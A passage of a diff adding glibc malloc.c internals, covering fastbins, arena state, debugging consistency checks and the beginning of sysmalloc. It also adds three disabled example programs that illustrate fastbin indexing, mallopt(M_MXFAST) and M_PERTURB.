+    be consolidated with other free chunks. malloc_consolidate
+    releases all chunks in fastbins and consolidates them with
+    other free chunks.
+ */
+
+typedef struct malloc_chunk *mfastbinptr;
+#define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx])
+
+/* offset 2 to use otherwise unindexable first 2 bins */
+#define fastbin_index(sz) \
+  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
+
+
+/* The maximum fastbin request size we support */
+#define MAX_FAST_SIZE     (80 * SIZE_SZ / 4)
+
+#define NFASTBINS  (fastbin_index (request2size (MAX_FAST_SIZE)) + 1)
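+
+/* A minimal standalone sketch (not part of the upstream malloc.c): it
+   replays fastbin_index for the 64-bit case (SIZE_SZ == 8 -- an
+   assumption of this sketch), where chunks are spaced 16 bytes apart.
+   With the usual default max_fast (request size 64 * SIZE_SZ / 4), only
+   chunks up to 0x80 bytes -- indices 0..6 -- are fastbin-eligible,
+   while MAX_FAST_SIZE caps the array itself at NFASTBINS == 10.  */
+#if 0 /* standalone example; kept out of the build */
+#include <stdio.h>
+
+static unsigned
+ex_fastbin_index (unsigned long sz)
+{
+  return (unsigned) (sz >> 4) - 2;
+}
+
+int
+main (void)
+{
+  for (unsigned long sz = 0x20; sz <= 0xb0; sz += 0x10)
+    printf ("chunk size %#4lx -> fastbin %u\n", sz, ex_fastbin_index (sz));
+  return 0;
+}
+#endif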
+
+/*
+   FASTBIN_CONSOLIDATION_THRESHOLD is the size of a chunk in free()
+   that triggers automatic consolidation of possibly-surrounding
+   fastbin chunks. This is a heuristic, so the exact value should not
+   matter too much. It is defined at half the default trim threshold as a
+   compromise heuristic to only attempt consolidation if it is likely
+   to lead to trimming. However, it is not dynamically tunable, since
+   consolidation reduces fragmentation surrounding large chunks even
+   if trimming is not used.
+ */
+
+#define FASTBIN_CONSOLIDATION_THRESHOLD  (65536UL)
+
+/*
+   NONCONTIGUOUS_BIT indicates that MORECORE does not return contiguous
+   regions.  Otherwise, contiguity is exploited in merging together,
+   when possible, results from consecutive MORECORE calls.
+
+   The initial value comes from MORECORE_CONTIGUOUS, but is
+   changed dynamically if mmap is ever used as an sbrk substitute.
+ */
+
+#define NONCONTIGUOUS_BIT     (2U)
+
+#define contiguous(M)          (((M)->flags & NONCONTIGUOUS_BIT) == 0)
+#define noncontiguous(M)       (((M)->flags & NONCONTIGUOUS_BIT) != 0)
+#define set_noncontiguous(M)   ((M)->flags |= NONCONTIGUOUS_BIT)
+#define set_contiguous(M)      ((M)->flags &= ~NONCONTIGUOUS_BIT)
+
+/* Maximum size of memory handled in fastbins.  */
+static INTERNAL_SIZE_T global_max_fast;
+
+/*
+   Set value of max_fast.
+   Use impossibly small value if 0.
+   Precondition: there are no existing fastbin chunks in the main arena.
+   Since do_check_malloc_state () checks this, we call malloc_consolidate ()
+   before changing max_fast.  Note other arenas will leak their fast bin
+   entries if max_fast is reduced.
+ */
+
+#define set_max_fast(s) \
+  global_max_fast = (((s) == 0)						      \
+                     ? SMALLBIN_WIDTH : ((s + SIZE_SZ) & ~MALLOC_ALIGN_MASK))
+
+static inline INTERNAL_SIZE_T
+get_max_fast (void)
+{
+  /* Tell the GCC optimizers that global_max_fast is never larger
+     than MAX_FAST_SIZE.  This avoids out-of-bounds array accesses in
+     _int_malloc after constant propagation of the size parameter.
+     (The code never executes because malloc preserves the
+     global_max_fast invariant, but the optimizers may not recognize
+     this.)  */
+  if (global_max_fast > MAX_FAST_SIZE)
+    __builtin_unreachable ();
+  return global_max_fast;
+}
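+
+/* A minimal standalone sketch (not part of the upstream malloc.c):
+   max_fast can be tuned from an application through mallopt(M_MXFAST).
+   Setting it to 0 picks the "impossibly small" value mentioned above,
+   so freed small chunks skip the fastbins.  Note that on builds with
+   tcache enabled, small frees may still be cached there instead.  */
+#if 0 /* standalone example; kept out of the build */
+#include <malloc.h>
+#include <stdio.h>
+#include <stdlib.h>
+
+int
+main (void)
+{
+  if (mallopt (M_MXFAST, 0) != 1)
+    fprintf (stderr, "mallopt(M_MXFAST, 0) failed\n");
+
+  void *p = malloc (32);
+  free (p);                     /* no longer ends up in a fastbin */
+
+  /* Restore the usual default (64 * SIZE_SZ / 4 bytes).  */
+  mallopt (M_MXFAST, 64 * sizeof (size_t) / 4);
+  return 0;
+}
+#endif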
+
+/*
+   ----------- Internal state representation and initialization -----------
+ */
+
+/*
+   have_fastchunks indicates that there are probably some fastbin chunks.
+   It is set true on entering a chunk into any fastbin, and cleared early in
+   malloc_consolidate.  The value is approximate since it may be set when there
+   are no fastbin chunks, or it may be clear even if there are fastbin chunks
+   available.  Given its sole purpose is to reduce the number of redundant calls to
+   malloc_consolidate, it does not affect correctness.  As a result we can safely
+   use relaxed atomic accesses.
+ */
+
+
+struct malloc_state
+{
+  /* Serialize access.  */
+  __libc_lock_define (, mutex);
+
+  /* Flags (formerly in max_fast).  */
+  int flags;
+
+  /* Set if the fastbin chunks contain recently inserted free blocks.  */
+  /* Note this is a bool but not all targets support atomics on booleans.  */
+  int have_fastchunks;
+
+  /* Fastbins */
+  mfastbinptr fastbinsY[NFASTBINS];
+
+  /* Base of the topmost chunk -- not otherwise kept in a bin */
+  mchunkptr top;
+
+  /* The remainder from the most recent split of a small request */
+  mchunkptr last_remainder;
+
+  /* Normal bins packed as described above */
+  mchunkptr bins[NBINS * 2 - 2];
+
+  /* Bitmap of bins */
+  unsigned int binmap[BINMAPSIZE];
+
+  /* Linked list */
+  struct malloc_state *next;
+
+  /* Linked list for free arenas.  Access to this field is serialized
+     by free_list_lock in arena.c.  */
+  struct malloc_state *next_free;
+
+  /* Number of threads attached to this arena.  0 if the arena is on
+     the free list.  Access to this field is serialized by
+     free_list_lock in arena.c.  */
+  INTERNAL_SIZE_T attached_threads;
+
+  /* Memory allocated from the system in this arena.  */
+  INTERNAL_SIZE_T system_mem;
+  INTERNAL_SIZE_T max_system_mem;
+};
+
+struct malloc_par
+{
+  /* Tunable parameters */
+  unsigned long trim_threshold;
+  INTERNAL_SIZE_T top_pad;
+  INTERNAL_SIZE_T mmap_threshold;
+  INTERNAL_SIZE_T arena_test;
+  INTERNAL_SIZE_T arena_max;
+
+  /* Memory map support */
+  int n_mmaps;
+  int n_mmaps_max;
+  int max_n_mmaps;
+  /* the mmap_threshold is dynamic, until the user sets
+     it manually, at which point we need to disable any
+     dynamic behavior. */
+  int no_dyn_threshold;
+
+  /* Statistics */
+  INTERNAL_SIZE_T mmapped_mem;
+  INTERNAL_SIZE_T max_mmapped_mem;
+
+  /* First address handed out by MORECORE/sbrk.  */
+  char *sbrk_base;
+
+#if USE_TCACHE
+  /* Maximum number of buckets to use.  */
+  size_t tcache_bins;
+  size_t tcache_max_bytes;
+  /* Maximum number of chunks in each bucket.  */
+  size_t tcache_count;
+  /* Maximum number of chunks to remove from the unsorted list, which
+     aren't used to prefill the cache.  */
+  size_t tcache_unsorted_limit;
+#endif
+};
+
+/* There are several instances of this struct ("arenas") in this
+   malloc.  If you are adapting this malloc in a way that does NOT use
+   a static or mmapped malloc_state, you MUST explicitly zero-fill it
+   before using. This malloc relies on the property that malloc_state
+   is initialized to all zeroes (as is true of C statics).  */
+
+static struct malloc_state main_arena =
+{
+  .mutex = _LIBC_LOCK_INITIALIZER,
+  .next = &main_arena,
+  .attached_threads = 1
+};
+
+/* These variables are used for undumping support.  Chunks are marked
+   as using mmap, but we leave them alone if they fall into this
+   range.  NB: The chunk size for these chunks only includes the
+   initial size field (of SIZE_SZ bytes), there is no trailing size
+   field (unlike with regular mmapped chunks).  */
+static mchunkptr dumped_main_arena_start; /* Inclusive.  */
+static mchunkptr dumped_main_arena_end;   /* Exclusive.  */
+
+/* True if the pointer falls into the dumped arena.  Use this after
+   chunk_is_mmapped indicates a chunk is mmapped.  */
+#define DUMPED_MAIN_ARENA_CHUNK(p) \
+  ((p) >= dumped_main_arena_start && (p) < dumped_main_arena_end)
+
+/* There is only one instance of the malloc parameters.  */
+
+static struct malloc_par mp_ =
+{
+  .top_pad = DEFAULT_TOP_PAD,
+  .n_mmaps_max = DEFAULT_MMAP_MAX,
+  .mmap_threshold = DEFAULT_MMAP_THRESHOLD,
+  .trim_threshold = DEFAULT_TRIM_THRESHOLD,
+#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))
+  .arena_test = NARENAS_FROM_NCORES (1)
+#if USE_TCACHE
+  ,
+  .tcache_count = TCACHE_FILL_COUNT,
+  .tcache_bins = TCACHE_MAX_BINS,
+  .tcache_max_bytes = tidx2usize (TCACHE_MAX_BINS-1),
+  .tcache_unsorted_limit = 0 /* No limit.  */
+#endif
+};
+
+/*
+   Initialize a malloc_state struct.
+
+   This is called from ptmalloc_init () or from _int_new_arena ()
+   when creating a new arena.
+ */
+
+static void
+malloc_init_state (mstate av)
+{
+  int i;
+  mbinptr bin;
+
+  /* Establish circular links for normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      bin = bin_at (av, i);
+      bin->fd = bin->bk = bin;
+    }
+
+#if MORECORE_CONTIGUOUS
+  if (av != &main_arena)
+#endif
+  set_noncontiguous (av);
+  if (av == &main_arena)
+    set_max_fast (DEFAULT_MXFAST);
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  av->top = initial_top (av);
+}
+
+/*
+   Other internal utilities operating on mstates
+ */
+
+static void *sysmalloc (INTERNAL_SIZE_T, mstate);
+static int      systrim (size_t, mstate);
+static void     malloc_consolidate (mstate);
+
+
+/* -------------- Early definitions for debugging hooks ---------------- */
+
+/* Define and initialize the hook variables.  These weak definitions must
+   appear before any use of the variables in a function (arena.c uses one).  */
+#ifndef weak_variable
+/* In GNU libc we want the hook variables to be weak definitions to
+   avoid a problem with Emacs.  */
+# define weak_variable weak_function
+#endif
+
+/* Forward declarations.  */
+static void *malloc_hook_ini (size_t sz,
+                              const void *caller) __THROW;
+static void *realloc_hook_ini (void *ptr, size_t sz,
+                               const void *caller) __THROW;
+static void *memalign_hook_ini (size_t alignment, size_t sz,
+                                const void *caller) __THROW;
+
+#if HAVE_MALLOC_INIT_HOOK
+void weak_variable (*__malloc_initialize_hook) (void) = NULL;
+compat_symbol (libc, __malloc_initialize_hook,
+	       __malloc_initialize_hook, GLIBC_2_0);
+#endif
+
+void weak_variable (*__free_hook) (void *__ptr,
+                                   const void *) = NULL;
+void *weak_variable (*__malloc_hook)
+  (size_t __size, const void *) = malloc_hook_ini;
+void *weak_variable (*__realloc_hook)
+  (void *__ptr, size_t __size, const void *)
+  = realloc_hook_ini;
+void *weak_variable (*__memalign_hook)
+  (size_t __alignment, size_t __size, const void *)
+  = memalign_hook_ini;
+void weak_variable (*__after_morecore_hook) (void) = NULL;
+
+/* This function is called from the arena shutdown hook, to free the
+   thread cache (if it exists).  */
+static void tcache_thread_shutdown (void);
+
+/* ------------------ Testing support ----------------------------------*/
+
+static int perturb_byte;
+
+static void
+alloc_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte ^ 0xff, n);
+}
+
+static void
+free_perturb (char *p, size_t n)
+{
+  if (__glibc_unlikely (perturb_byte))
+    memset (p, perturb_byte, n);
+}
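+
+/* A minimal standalone sketch (not part of the upstream malloc.c):
+   perturb_byte is normally set through mallopt(M_PERTURB) or the
+   MALLOC_PERTURB_ environment variable.  With it enabled, fresh
+   allocations are filled with perturb_byte ^ 0xff and freed memory is
+   overwritten with perturb_byte, which makes use of uninitialized or
+   stale heap data much easier to spot.  */
+#if 0 /* standalone example; kept out of the build */
+#include <malloc.h>
+#include <stdio.h>
+#include <stdlib.h>
+
+int
+main (void)
+{
+  mallopt (M_PERTURB, 0x5a);
+
+  unsigned char *p = malloc (16);
+  /* Expect 0xa5 (0x5a ^ 0xff): this first allocation is filled by
+     alloc_perturb rather than containing leftover data.  */
+  printf ("fresh byte: %#04x\n", p[0]);
+  free (p);
+  return 0;
+}
+#endif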
+
+
+
+#include <stap-probe.h>
+
+/* ------------------- Support for multiple arenas -------------------- */
+#include "arena.c"
+
+/*
+   Debugging support
+
+   These routines make a number of assertions about the states
+   of data structures that should be true at all times. If any
+   are not true, it's very likely that a user program has somehow
+   trashed memory. (It's also possible that there is a coding error
+   in malloc. In which case, please report it!)
+ */
+
+#if !MALLOC_DEBUG
+
+# define check_chunk(A, P)
+# define check_free_chunk(A, P)
+# define check_inuse_chunk(A, P)
+# define check_remalloced_chunk(A, P, N)
+# define check_malloced_chunk(A, P, N)
+# define check_malloc_state(A)
+
+#else
+
+# define check_chunk(A, P)              do_check_chunk (A, P)
+# define check_free_chunk(A, P)         do_check_free_chunk (A, P)
+# define check_inuse_chunk(A, P)        do_check_inuse_chunk (A, P)
+# define check_remalloced_chunk(A, P, N) do_check_remalloced_chunk (A, P, N)
+# define check_malloced_chunk(A, P, N)   do_check_malloced_chunk (A, P, N)
+# define check_malloc_state(A)         do_check_malloc_state (A)
+
+/*
+   Properties of all chunks
+ */
+
+static void
+do_check_chunk (mstate av, mchunkptr p)
+{
+  unsigned long sz = chunksize (p);
+  /* min and max possible addresses assuming contiguous allocation */
+  char *max_address = (char *) (av->top) + chunksize (av->top);
+  char *min_address = max_address - av->system_mem;
+
+  if (!chunk_is_mmapped (p))
+    {
+      /* Has legal address ... */
+      if (p != av->top)
+        {
+          if (contiguous (av))
+            {
+              assert (((char *) p) >= min_address);
+              assert (((char *) p + sz) <= ((char *) (av->top)));
+            }
+        }
+      else
+        {
+          /* top size is always at least MINSIZE */
+          assert ((unsigned long) (sz) >= MINSIZE);
+          /* top predecessor always marked inuse */
+          assert (prev_inuse (p));
+        }
+    }
+  else if (!DUMPED_MAIN_ARENA_CHUNK (p))
+    {
+      /* address is outside main heap  */
+      if (contiguous (av) && av->top != initial_top (av))
+        {
+          assert (((char *) p) < min_address || ((char *) p) >= max_address);
+        }
+      /* chunk is page-aligned */
+      assert (((prev_size (p) + sz) & (GLRO (dl_pagesize) - 1)) == 0);
+      /* mem is aligned */
+      assert (aligned_OK (chunk2mem (p)));
+    }
+}
+
+/*
+   Properties of free chunks
+ */
+
+static void
+do_check_free_chunk (mstate av, mchunkptr p)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+  mchunkptr next = chunk_at_offset (p, sz);
+
+  do_check_chunk (av, p);
+
+  /* Chunk must claim to be free ... */
+  assert (!inuse (p));
+  assert (!chunk_is_mmapped (p));
+
+  /* Unless a special marker, must have OK fields */
+  if ((unsigned long) (sz) >= MINSIZE)
+    {
+      assert ((sz & MALLOC_ALIGN_MASK) == 0);
+      assert (aligned_OK (chunk2mem (p)));
+      /* ... matching footer field */
+      assert (prev_size (next_chunk (p)) == sz);
+      /* ... and is fully consolidated */
+      assert (prev_inuse (p));
+      assert (next == av->top || inuse (next));
+
+      /* ... and has minimally sane links */
+      assert (p->fd->bk == p);
+      assert (p->bk->fd == p);
+    }
+  else /* markers are always of size SIZE_SZ */
+    assert (sz == SIZE_SZ);
+}
+
+/*
+   Properties of inuse chunks
+ */
+
+static void
+do_check_inuse_chunk (mstate av, mchunkptr p)
+{
+  mchunkptr next;
+
+  do_check_chunk (av, p);
+
+  if (chunk_is_mmapped (p))
+    return; /* mmapped chunks have no next/prev */
+
+  /* Check whether it claims to be in use ... */
+  assert (inuse (p));
+
+  next = next_chunk (p);
+
+  /* ... and is surrounded by OK chunks.
+     Since more things can be checked with free chunks than inuse ones,
+     if an inuse chunk borders them and debug is on, it's worth doing them.
+   */
+  if (!prev_inuse (p))
+    {
+      /* Note that we cannot even look at prev unless it is not inuse */
+      mchunkptr prv = prev_chunk (p);
+      assert (next_chunk (prv) == p);
+      do_check_free_chunk (av, prv);
+    }
+
+  if (next == av->top)
+    {
+      assert (prev_inuse (next));
+      assert (chunksize (next) >= MINSIZE);
+    }
+  else if (!inuse (next))
+    do_check_free_chunk (av, next);
+}
+
+/*
+   Properties of chunks recycled from fastbins
+ */
+
+static void
+do_check_remalloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  INTERNAL_SIZE_T sz = chunksize_nomask (p) & ~(PREV_INUSE | NON_MAIN_ARENA);
+
+  if (!chunk_is_mmapped (p))
+    {
+      assert (av == arena_for_chunk (p));
+      if (chunk_main_arena (p))
+        assert (av == &main_arena);
+      else
+        assert (av != &main_arena);
+    }
+
+  do_check_inuse_chunk (av, p);
+
+  /* Legal size ... */
+  assert ((sz & MALLOC_ALIGN_MASK) == 0);
+  assert ((unsigned long) (sz) >= MINSIZE);
+  /* ... and alignment */
+  assert (aligned_OK (chunk2mem (p)));
+  /* chunk is less than MINSIZE more than request */
+  assert ((long) (sz) - (long) (s) >= 0);
+  assert ((long) (sz) - (long) (s + MINSIZE) < 0);
+}
+
+/*
+   Properties of nonrecycled chunks at the point they are malloced
+ */
+
+static void
+do_check_malloced_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T s)
+{
+  /* same as recycled case ... */
+  do_check_remalloced_chunk (av, p, s);
+
+  /*
+     ... plus,  must obey implementation invariant that prev_inuse is
+     always true of any allocated chunk; i.e., that each allocated
+     chunk borders either a previously allocated and still in-use
+     chunk, or the base of its memory arena. This is ensured
+     by making all allocations from the `lowest' part of any found
+     chunk.  This does not necessarily hold however for chunks
+     recycled via fastbins.
+   */
+
+  assert (prev_inuse (p));
+}
+
+
+/*
+   Properties of malloc_state.
+
+   This may be useful for debugging malloc, as well as detecting user
+   programmer errors that somehow write into malloc_state.
+
+   If you are extending or experimenting with this malloc, you can
+   probably figure out how to hack this routine to print out or
+   display chunk addresses, sizes, bins, and other instrumentation.
+ */
+
+static void
+do_check_malloc_state (mstate av)
+{
+  int i;
+  mchunkptr p;
+  mchunkptr q;
+  mbinptr b;
+  unsigned int idx;
+  INTERNAL_SIZE_T size;
+  unsigned long total = 0;
+  int max_fast_bin;
+
+  /* internal size_t must be no wider than pointer type */
+  assert (sizeof (INTERNAL_SIZE_T) <= sizeof (char *));
+
+  /* alignment is a power of 2 */
+  assert ((MALLOC_ALIGNMENT & (MALLOC_ALIGNMENT - 1)) == 0);
+
+  /* Check the arena is initialized. */
+  assert (av->top != 0);
+
+  /* No memory has been allocated yet, so doing more tests is not possible.  */
+  if (av->top == initial_top (av))
+    return;
+
+  /* pagesize is a power of 2 */
+  assert (powerof2(GLRO (dl_pagesize)));
+
+  /* A contiguous main_arena is consistent with sbrk_base.  */
+  if (av == &main_arena && contiguous (av))
+    assert ((char *) mp_.sbrk_base + av->system_mem ==
+            (char *) av->top + chunksize (av->top));
+
+  /* properties of fastbins */
+
+  /* max_fast is in allowed range */
+  assert ((get_max_fast () & ~1) <= request2size (MAX_FAST_SIZE));
+
+  max_fast_bin = fastbin_index (get_max_fast ());
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      p = fastbin (av, i);
+
+      /* The following test can only be performed for the main arena.
+         While mallopt calls malloc_consolidate to get rid of all fast
+         bins (especially those larger than the new maximum) this does
+         only happen for the main arena.  Trying to do this for any
+         other arena would mean those arenas have to be locked and
+         malloc_consolidate be called for them.  This is excessive.  And
+         even if this is acceptable to somebody it still cannot solve
+         the problem completely since if the arena is locked a
+         concurrent malloc call might create a new arena which then
+         could use the newly invalid fast bins.  */
+
+      /* all bins past max_fast are empty */
+      if (av == &main_arena && i > max_fast_bin)
+        assert (p == 0);
+
+      while (p != 0)
+        {
+          /* each chunk claims to be inuse */
+          do_check_inuse_chunk (av, p);
+          total += chunksize (p);
+          /* chunk belongs in this bin */
+          assert (fastbin_index (chunksize (p)) == i);
+          p = p->fd;
+        }
+    }
+
+  /* check normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+
+      /* binmap is accurate (except for bin 1 == unsorted_chunks) */
+      if (i >= 2)
+        {
+          unsigned int binbit = get_binmap (av, i);
+          int empty = last (b) == b;
+          if (!binbit)
+            assert (empty);
+          else if (!empty)
+            assert (binbit);
+        }
+
+      for (p = last (b); p != b; p = p->bk)
+        {
+          /* each chunk claims to be free */
+          do_check_free_chunk (av, p);
+          size = chunksize (p);
+          total += size;
+          if (i >= 2)
+            {
+              /* chunk belongs in bin */
+              idx = bin_index (size);
+              assert (idx == i);
+              /* lists are sorted */
+              assert (p->bk == b ||
+                      (unsigned long) chunksize (p->bk) >= (unsigned long) chunksize (p));
+
+              if (!in_smallbin_range (size))
+                {
+                  if (p->fd_nextsize != NULL)
+                    {
+                      if (p->fd_nextsize == p)
+                        assert (p->bk_nextsize == p);
+                      else
+                        {
+                          if (p->fd_nextsize == first (b))
+                            assert (chunksize (p) < chunksize (p->fd_nextsize));
+                          else
+                            assert (chunksize (p) > chunksize (p->fd_nextsize));
+
+                          if (p == first (b))
+                            assert (chunksize (p) > chunksize (p->bk_nextsize));
+                          else
+                            assert (chunksize (p) < chunksize (p->bk_nextsize));
+                        }
+                    }
+                  else
+                    assert (p->bk_nextsize == NULL);
+                }
+            }
+          else if (!in_smallbin_range (size))
+            assert (p->fd_nextsize == NULL && p->bk_nextsize == NULL);
+          /* chunk is followed by a legal chain of inuse chunks */
+          for (q = next_chunk (p);
+               (q != av->top && inuse (q) &&
+                (unsigned long) (chunksize (q)) >= MINSIZE);
+               q = next_chunk (q))
+            do_check_inuse_chunk (av, q);
+        }
+    }
+
+  /* top chunk is OK */
+  check_chunk (av, av->top);
+}
+#endif
+
+
+/* ----------------- Support for debugging hooks -------------------- */
+#include "hooks.c"
+
+
+/* ----------- Routines dealing with system allocation -------------- */
+
+/*
+   sysmalloc handles malloc cases requiring more memory from the system.
+   On entry, it is assumed that av->top does not have enough
+   space to service a request for nb bytes, thus requiring that av->top
+   be extended or replaced.
+ */
+
+static void *
+sysmalloc (INTERNAL_SIZE_T nb, mstate av)
+{
+  mchunkptr old_top;              /* incoming value of av->top */
+  INTERNAL_SIZE_T old_size;       /* its size */
+  char *old_end;                  /* its end address */
+
+  long size;                      /* arg to first MORECORE or mmap call */
+  char *brk;                      /* return value from MORECORE */
+
+  long correction;                /* arg to 2nd MORECORE call */
+  char *snd_brk;                  /* 2nd return val */
+
+  INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
+  INTERNAL_SIZE_T end_misalign;   /* partial page left at end of new space */
+  char *aligned_brk;              /* aligned offset into brk */
+
+  mchunkptr p;                    /* the allocated/returned chunk */
+  mchunkptr remainder;            /* remainder from allocation */
+  unsigned long remainder_size;   /* its size */
+
+
+  size_t pagesize = GLRO (dl_pagesize);
+  bool tried_mmap = false;
+
+
+  /*
+     If have mmap, and the request size meets the mmap threshold, and
+     the system supports mmap, and there are few enough currently
+     allocated mmapped regions, try to directly map this request
+     rather than expanding top.
+   */
+
+  if (av == NULL
+      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
+	  && (mp_.n_mmaps < mp_.n_mmaps_max)))
+    {
+      char *mm;           /* return value from mmap call*/
+
+    try_mmap:
+      /*
+         Round up size to nearest page.  For mmapped chunks, the overhead
+         is one SIZE_SZ unit larger than for normal chunks, because there
+         is no following chunk whose prev_size field could be used.
+
+         See the front_misalign handling below; for glibc there is no
+         need for further alignments unless we have high alignment.
+       */
+      if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+        size = ALIGN_UP (nb + SIZE_SZ, pagesize);
+      else
+        size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
+      tried_mmap = true;
+
+      /* Don't try if size wraps around 0 */
+      if ((unsigned long) (size) > (unsigned long) (nb))
+        {
+          mm = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+          if (mm != MAP_FAILED)
+            {
+              /*
+                 The offset to the start of the mmapped region is stored
+                 in the prev_size field of the chunk. This allows us to adjust
+                 returned start address to meet alignment requirements here
+                 and in memalign(), and still be able to compute proper
+                 address argument for later munmap in free() and realloc().
+               */
+
+              if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                {
+                  /* For glibc, chunk2mem increases the address by 2*SIZE_SZ and
+                     MALLOC_ALIGN_MASK is 2*SIZE_SZ-1.  Each mmap'ed area is page
+                     aligned and therefore definitely MALLOC_ALIGN_MASK-aligned.  */
+                  assert (((INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK) == 0);
+                  front_misalign = 0;
+                }
+              else
+                front_misalign = (INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK;
+              if (front_misalign > 0)
+                {
+                  correction = MALLOC_ALIGNMENT - front_misalign;
+                  p = (mchunkptr) (mm + correction);
+		  set_prev_size (p, correction);
+                  set_head (p, (size - correction) | IS_MMAPPED);
+                }
+              else
+                {
+                  p = (mchunkptr) mm;
+		  set_prev_size (p, 0);
+                  set_head (p, size | IS_MMAPPED);
+                }
+
+              /* update statistics */
+
+              int new = atomic_exchange_and_add (&mp_.n_mmaps, 1) + 1;
+              atomic_max (&mp_.max_n_mmaps, new);
+
+              unsigned long sum;
+              sum = atomic_exchange_and_add (&mp_.mmapped_mem, size) + size;
+              atomic_max (&mp_.max_mmapped_mem, sum);
+
+              check_chunk (av, p);
+
+              return chunk2mem (p);
+            }
+        }
+    }
+
+  /* There are no usable arenas and mmap also failed.  */
+  if (av == NULL)
+    return 0;
+
+  /* Record incoming configuration of top */
+
+  old_top = av->top;
+  old_size = chunksize (old_top);
+  old_end = (char *) (chunk_at_offset (old_top, old_size));
+
+  brk = snd_brk = (char *) (MORECORE_FAILURE);
+
+  /*
+     If not the first time through, we require old_size to be
+     at least MINSIZE and to have prev_inuse set.
+   */
+
+  assert ((old_top == initial_top (av) && old_size == 0) ||
+          ((unsigned long) (old_size) >= MINSIZE &&
+           prev_inuse (old_top) &&
+           ((unsigned long) old_end & (pagesize - 1)) == 0));
+
+  /* Precondition: not enough current space to satisfy nb request */
+  assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
+
+
+  if (av != &main_arena)
+    {
+      heap_info *old_heap, *heap;
+      size_t old_heap_size;
+
+      /* First try to extend the current heap. */
+      old_heap = heap_for_ptr (old_top);
+      old_heap_size = old_heap->size;
+      if ((long) (MINSIZE + nb - old_size) > 0
+          && grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
+        {
+          av->system_mem += old_heap->size - old_heap_size;
+          set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
+                    | PREV_INUSE);
+        }
+      else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
+        {
+          /* Use a newly allocated heap.  */
+          heap->ar_ptr = av;
+          heap->prev = old_heap;
+          av->system_mem += heap->size;
+          /* Set up the new top.  */
+          top (av) = chunk_at_offset (heap, sizeof (*heap));
+          set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);
+
+          /* Setup fencepost and free the old top chunk with a multiple of
+             MALLOC_ALIGNMENT in size. */
+          /* The fencepost takes at least MINSIZE bytes, because it might
+             become the top chunk again later.  Note that a footer is set
+             up, too, although the chunk is marked in use. */
+          old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
+          set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE);
+          if (old_size >= MINSIZE)
+            {
+              set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
+              set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
+              _int_free (av, old_top, 1);
+            }
+          else
+            {
+              set_head (old_top, (old_size + 2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (old_top, (old_size + 2 * SIZE_SZ));
+            }
+        }
+      else if (!tried_mmap)
+        /* We can at least try to use mmap to get memory.  */
+        goto try_mmap;
+    }
+  else     /* av == main_arena */
+
+
+    { /* Request enough space for nb + pad + overhead */
+      size = nb + mp_.top_pad + MINSIZE;
+
+      /*
+         If contiguous, we can subtract out existing space that we hope to
+         combine with new space. We add it back later only if
+         we don't actually get contiguous space.
+       */
+
+      if (contiguous (av))
+        size -= old_size;
+
+      /*
+         Round to a multiple of page size.
+         If MORECORE is not contiguous, this ensures that we only call it
+         with whole-page arguments.  And if MORECORE is contiguous and
+         this is not first time through, this preserves page-alignment of
+         previous calls. Otherwise, we correct to page-align below.
+       */
+
+      size = ALIGN_UP (size, pagesize);
+
+      /*
+         Don't try to call MORECORE if argument is so big as to appear
+         negative. Note that since mmap takes size_t arg, it may succeed
+         below even if we cannot call MORECORE.
+       */
+
+      if (size > 0)
+        {
+          brk = (char *) (MORECORE (size));
+          LIBC_PROBE (memory_sbrk_more, 2, brk, size);
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          /* Call the `morecore' hook if necessary.  */
+          void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+          if (__builtin_expect (hook != NULL, 0))
+            (*hook)();
+        }
+      else
+        {
+          /*
+             If have mmap, try using it as a backup when MORECORE fails or
+             cannot be used. This is worth doing on systems that have "holes" in
+             address space, so sbrk cannot extend to give contiguous space, but
+             space is available elsewhere.  Note that we ignore mmap max count
+             and threshold limits, since the space will not be used as a
+             segregated mmap region.
+           */
+
+          /* Cannot merge with old top, so add its size back in */
+          if (contiguous (av))
+            size = ALIGN_UP (size + old_size, pagesize);
+
+          /* If we are relying on mmap as backup, then use larger units */
+          if ((unsigned long) (size) < (unsigned long) (MMAP_AS_MORECORE_SIZE))
+            size = MMAP_AS_MORECORE_SIZE;
+
+          /* Don't try if size wraps around 0 */
+          if ((unsigned long) (size) > (unsigned long) (nb))
+            {
+              char *mbrk = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+              if (mbrk != MAP_FAILED)
+                {
+                  /* We do not need, and cannot use, another sbrk call to find end */
